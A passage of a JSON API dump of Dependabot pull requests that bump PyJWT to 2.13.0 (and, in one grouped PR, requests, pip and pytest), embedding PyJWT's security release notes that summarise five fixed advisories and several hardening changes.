\u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nU...\n\n_Description has been truncated_","html_url":"https://github.com/ral-facilities/ldap-jwt-auth/pull/374","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ral-facilities%2Fldap-jwt-auth/issues/374","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/374/packages"},{"uuid":"4556387929","node_id":"PR_kwDOSsrJJs7hCN0-","number":7,"state":"open","title":"chore(deps): bump pyjwt from 2.12.1 to 2.13.0 in the auth group","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-31T02:57:53.000Z","updated_at":"2026-05-31T02:57:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps)","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"the auth group","ecosystem":"pip"},"body":"Bumps the auth group with 1 update: [pyjwt](https://github.com/jpadilla/pyjwt).\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/aaronsun0811-dot/scenelet-ai-video/pull/7","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aaronsun0811-dot%2Fscenelet-ai-video/issues/7","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7/packages"}],"issue_packages":[{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-14T23:25:36.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4660994181","node_id":"PR_kwDOAUUStM7mU7cd","number":2434,"state":"open","title":"build(deps): bump the dependencies group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["skip-changelog","minor","chore"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T23:25:36.000Z","updated_at":"2026-06-14T23:25:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"dependencies","update_count":4,"packages":[{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pip","old_version":"26.1","new_version":"26.1.2","repository_url":"https://github.com/pypa/pip"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"}],"path":null,"ecosystem":"pip"},"body":"Bumps the dependencies group with 4 updates in the / directory: [requests](https://github.com/psf/requests), [pyjwt](https://github.com/jpadilla/pyjwt), [pip](https://github.com/pypa/pip) and [pytest](https://github.com/pytest-dev/pytest).\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 